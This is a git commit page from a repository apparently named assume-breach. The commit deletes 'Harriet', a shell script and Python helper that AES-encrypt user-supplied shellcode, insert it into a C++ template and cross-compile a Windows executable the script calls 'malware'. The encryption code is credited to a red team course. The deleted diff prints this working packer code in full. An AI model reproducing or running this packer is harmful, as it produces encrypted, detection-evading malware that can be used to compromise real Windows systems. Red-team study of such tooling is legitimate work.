浏览代码

Delete Harriet/Harriet directory

assume-breach 3 年之前
父节点
当前提交
ab7a55a3c4
共有 3 个文件被更改,包括 0 次插入104 次删除
  1. 0 77
      Harriet/Harriet/Harriet.sh
  2. 0 1
      Harriet/Harriet/Resources/template.cpp
  3. 0 26
      Harriet/Harriet/aesencrypt.py

+ 0 - 77
Harriet/Harriet/Harriet.sh

@@ -1,77 +0,0 @@
-#!/bin/bash
-
-# Color variables
-red='\033[0;31m'
-green='\033[0;32m'
-yellow='\033[0;33m'
-blue='\033[0;34m'
-magenta='\033[0;35m'
-cyan='\033[0;36m'
-# Clear the color after that
-clear='\033[0m'
-cat << "EOF"
-  __ _ ___ ___ _   _ _ __ ___   ___      | |__  _ __ ___  __ _  ___| |__  
- / _` / __/ __| | | | '_ ` _ \ / _ \_____| '_ \| '__/ _ \/ _` |/ __| '_ \ 
-| (_| \__ \__ \ |_| | | | | | |  __/_____| |_) | | |  __/ (_| | (__| | | |
- \__,_|___/___/\__,_|_| |_| |_|\___|     |_.__/|_|  \___|\__,_|\___|_| |_|
-                            
-                                **Harriet**
-                                
-                       A PE Packer With AES Encryption
-               
-                   
- 
-EOF
-echo -e ${green}"Enter A Random Word!"${clear}
-echo ""
-read Random1
-echo""
-echo -e ${green}"Enter A Random Word!"${clear}
-echo ""
-read Random2
-echo ""
-echo -e ${green}"Enter A Random Word!"${clear}
-echo ""
-read Random3
-echo ""
-echo -e ${green}"Enter The Path To Your Shellcode File. ex: /home/user/Downloads/shellcode.bin"${clear}
-echo ""
-read Shellcode
-echo ""
-echo -e ${green}"Name Your Malware! ex: malware.exe"${clear}
-echo ""
-read Random4
-echo ""
-cp ../template.cpp Resources/template.cpp
-echo -e ${yellow}"Encrypting Payload" ${clear}
-echo ""
-sleep 2
-python aesencrypt.py $Shellcode > shell.txt
-echo -e ${yellow}"Encryption Completed"${clear}
-echo ""
-sed -i s/Random1/$Random1/g Resources/template.cpp
-
-sed -i s/Random2/$Random2/g Resources/template.cpp
-
-sed -i s/Random3/$Random3/g Resources/template.cpp
-
-cp shell.txt shell2.txt
-
-keys=$(cat "shell2.txt")
-cut -d 'p' -f1 shell2.txt > shell3.txt
-keys=$(cat shell3.txt)
-keysnow=${keys#*=}
-sed -i "s/KEYVALUE/$keysnow/g" Resources/template.cpp
-
-payload=$(cat "shell.txt")
-payloadnow=${payload#*;}
-payloadtoday=${payloadnow#*=}
-echo $payloadtoday > shell5.txt
-perl -pe 's/PAYVAL/`cat shell5.txt`/ge' -i Resources/template.cpp
-sleep 2
-echo -e ${yellow}"Compiling Malware"${clear}
-x86_64-w64-mingw32-g++ -o $Random4 Resources/template.cpp -fpermissive -Wno-narrowing >/dev/null 2>&1
-echo ""
-sleep 2
-echo -e ${yellow}"Malware Compiled. Happy Hunting"${clear}
-rm shell*

+ 0 - 1
Harriet/Harriet/Resources/template.cpp

@@ -1 +0,0 @@
-

+ 0 - 26
Harriet/Harriet/aesencrypt.py

@@ -1,26 +0,0 @@
-# Red Team Operator course code template
-# payload encryption with AES
-# 
-# author: reenz0h (twitter: @SEKTOR7net)
-
-import sys
-from base64 import b64encode
-from Crypto.Cipher import AES
-from Crypto.Util.Padding import pad
-from Crypto.Random import get_random_bytes
-import hashlib
-
-KEY = get_random_bytes(16)
-iv = 16 * b'\x00'
-cipher = AES.new(hashlib.sha256(KEY).digest(), AES.MODE_CBC, iv)
-
-try:
-    plaintext = open(sys.argv[1], "rb").read()
-except:
-    print("File argument needed! %s <raw payload file>" % sys.argv[0])
-    sys.exit()
-
-ciphertext = cipher.encrypt(pad(plaintext, AES.block_size))
-
-print('AESkey[] = { 0x' + ', 0x'.join(hex(x)[2:] for x in KEY) + ' };')
-print('payload[] = { 0x' + ', 0x'.join(hex(x)[2:] for x in ciphertext) + ' };')